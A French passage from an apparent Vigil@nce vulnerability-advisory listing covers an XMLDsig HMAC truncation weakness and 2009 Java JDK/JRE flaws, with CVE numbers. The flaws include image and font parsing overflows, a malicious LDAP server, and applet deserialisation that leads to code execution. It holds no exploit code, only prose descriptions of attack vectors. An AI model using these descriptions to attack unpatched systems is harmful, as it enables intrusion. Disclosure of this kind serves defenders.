Cependant, la spécification n'impose pas de taille minimum. Un attaquant peut donc envoyer un document signé avec ds:HMACOutputLength valant 1, afin que le destinataire ne vérifie qu'un seul bit.

Plusieurs implémentations de XMLDsig ont suivi la recommandation, et n'imposent pas de minimum. Ces implémentations sont donc vulnérables.
Bulletin Vigil@nce complet... (Essai gratuit)

annonce de vulnérabilité 8662

Java : corruption de mémoire

Synthèse de la vulnérabilité

Une applet Java illicite peut corrompre la mémoire afin d'exécuter du code.
Produits concernés : Java OpenJDK, Java Oracle.
Gravité : 3/4.
Conséquences : accès/droits utilisateur.
Provenance : document.
Date création : 22/04/2009.
Références : TZO-12-200, VIGILANCE-VUL-8662.

Description de la vulnérabilité

Une applet illicite peut corrompre la mémoire afin d'exécuter du code.
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité CVE-2006-2426 CVE-2009-1093 CVE-2009-1094

Java JDK/JRE/SDK : multiples vulnérabilités

Synthèse de la vulnérabilité

Plusieurs vulnérabilités ont été annoncées dans Java JDK/JRE/SDK.
Produits concernés : Debian, Fedora, HP-UX, MES, Mandriva Linux, NLD, OES, Java OpenJDK, openSUSE, Java Oracle, RHEL, SLES, ESX, ESXi, VMware Server, vCenter Server, VirtualCenter.
Gravité : 4/4.
Conséquences : accès/droits utilisateur, lecture de données, déni de service du service, déni de service du client.
Provenance : document.
Nombre de vulnérabilités dans ce bulletin : 16.
Date création : 26/03/2009.
Références : 254569, 254570, 254571, 254608, 254609, 254610, 254611, 6522586, 6630639, 6632886, 6636360, 6646860, 6706490, 6717680, 6724331, 6737315, 6782871, 6792554, 6798948, 6804996, 6804997, 6804998, 6804999, BID-34240, c01745133, c01805643, CERTA-2010-AVI-043, CERTA-2010-AVI-217, CVE-2006-2426, CVE-2009-1093, CVE-2009-1094, CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, CVE-2009-1107, DSA-1769-1, FEDORA-2009-3058, HPSBMA02445, HPSBUX02429, MDVSA-2009:137, MDVSA-2009:162, RHSA-2009:0377-01, RHSA-2009:0392-01, RHSA-2009:0394-01, RHSA-2009:1038-01, RHSA-2009:1198-02, RHSA-2009:1662-01, SSRT090058, SUSE-SA:2009:016, SUSE-SA:2009:029, SUSE-SA:2009:036, SUSE-SR:2009:011, VIGILANCE-VUL-8564, VMSA-2009-0014, VMSA-2009-0014.1, VMSA-2009-0014.2, VMSA-2009-0016, VMSA-2009-0016.1, VMSA-2009-0016.2, VMSA-2009-0016.3, VMSA-2009-0016.4, VMSA-2009-0016.5, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3.

Description de la vulnérabilité

Plusieurs vulnérabilités ont été annoncées dans Java JDK/JRE/SDK.

Un client peut initialiser une connexion de manière spéciale afin de mener un déni de service sur le serveur LDAP. [grav:2/4; 254569, 6717680, CERTA-2010-AVI-043, CVE-2009-1093]

Un serveur LDAP illicite peut provoquer l'exécution de code sur le client. [grav:3/4; 254569, 6737315, CVE-2009-1094]

Plusieurs débordements dans l'utilitaire unpack200 d'extraction JAR conduisent à l'exécution de code. [grav:4/4; 254570, 6792554, CVE-2009-1095, CVE-2009-1096]

Une image PNG illicite provoque un débordement d'entier conduisant à l'exécution de code. [grav:4/4; 254571, 6804996, CVE-2009-1097]

Java Web Start affiche une image lors de son démarrage ("splash screen"). Une image GIF illicite provoque une erreur de décodage conduisant à l'exécution de code. [grav:4/4; 254571, 6804997]

Une image GIF illicite provoque une erreur dans le calcul d'un offset, ce qui corrompt la mémoire et conduit à l'exécution de code. [grav:4/4; 254571, 6804998, CVE-2009-1098]

Une police de caractères illicite force l'utilisation d'un entier négatif, puis l'écriture avant le buffer alloué, ce qui conduit à l'exécution de code. [grav:4/4; 254571, 6804999]

L'utilisation d'un fichier de police de caractères illicite consomme un espace disque important. [grav:2/4; 254608, 6522586]

L'utilisation d'un fichier de police de caractères illicite consomme un espace disque important. [grav:2/4; 254608, 6632886]

Un attaquant distant peut mener un déni de service via HTTP sur JAX-WS Service Endpoint. [grav:2/4; 254609, 6630639, CVE-2009-1101]

Une erreur dans la génération de code permet à une applet illicite d'exécuter du code sur la machine. [grav:4/4; 254610, 6636360, CVE-2009-1102]

Une erreur dans la désérialisation de Java Plug-in permet à une applet d'exécuter du code. [grav:4/4; 254611, 6646860, CVE-2009-1103]

Du code JavaScript peut employer le Plug-in pour se connecter sur les ports du système via LiveConnect. [grav:3/4; 254611, 6724331, CVE-2009-1104]

Une applet peut demander à s'exécuter sur une version vulnérable du JRE. [grav:2/4; 254611, 6706490, CERTA-2010-AVI-217, CVE-2009-1105]

Une applet peut se connecter sur les sites fournissant crossdomain.xml. [grav:2/4; 254611, 6798948, CVE-2009-1106]

Une applet signée peut masquer le contenu de boîtes de dialogue et inviter la victime à cliquer. [grav:1/4; 254611, 6782871, CVE-2009-1107]
Bulletin Vigil@nce complet... (Essai gratuit)
Notre base de données contient d'autres bulletins. Vous pouvez utiliser un essai gratuit pour les consulter.

Consulter les informations sur Sun J2SE :